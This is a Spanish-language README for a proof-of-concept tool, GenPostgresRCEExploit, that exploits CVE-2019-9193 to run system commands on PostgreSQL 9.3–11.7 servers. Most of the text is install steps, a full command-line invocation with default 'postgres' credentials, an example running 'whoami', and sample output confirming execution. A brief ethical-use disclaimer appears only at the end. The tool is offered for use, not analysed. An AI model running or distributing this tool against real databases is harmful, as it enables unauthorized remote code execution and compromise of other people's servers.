
es una herramienta PoC diseñada para explotar una vulnerabilidad autenticada de ejecución remota de código (RCE) en versiones específicas de PostgreSQL (9.3 - 11.7)
GenPostgresRCEExploit es una herramienta PoC diseñada para explotar una vulnerabilidad de Ejecución Remota de Código (RCE) autenticada en versiones específicas de PostgreSQL (9.3 - 11.7). Permite a usuarios autenticados ejecutar comandos del sistema en un servidor de base de datos PostgreSQL que sea vulnerable a CVE-2019-9193.
psycopg2)git clone https://github.com/geniuszly/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <ip_objetivo> -p <puerto> -d <nombre_base_datos> -U <usuario> -P <contraseña> -c "<comando_sistema>"
-i, --ip: Dirección IP del servidor PostgreSQL (Por defecto: 127.0.0.1)-p, --port: Puerto del servidor PostgreSQL (Por defecto: 5432)-d, --database: Nombre de la base de datos PostgreSQL (Por defecto: template1)-U, --user: Nombre de usuario para conectarse al servidor PostgreSQL (Por defecto: postgres)-P, --password: Contraseña para conectarse al servidor PostgreSQL (Por defecto: postgres)-c, --command: Comando del sistema a ejecutar en el servidor-t, --timeout: Tiempo de espera de conexión en segundos (Por defecto: 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
Este ejemplo se conecta a un servidor PostgreSQL en 192.168.1.10, se autentica con las credenciales proporcionadas y ejecuta el comando whoami.
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Conectando a la base de datos PostgreSQL en 192.168.1.10:5432
[+] Conexión establecida exitosamente
[+] Verificando versión de PostgreSQL
[+] Versión vulnerable de PostgreSQL detectada: 10.4
[+] Creando tabla temporal: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Comando ejecutado exitosamente
postgres
Esta herramienta está destinada únicamente a fines educativos y pruebas éticas. El uso no autorizado de esta herramienta contra cualquier sistema es ilegal y está estrictamente prohibido. Los autores no se responsabilizan por cualquier uso indebido.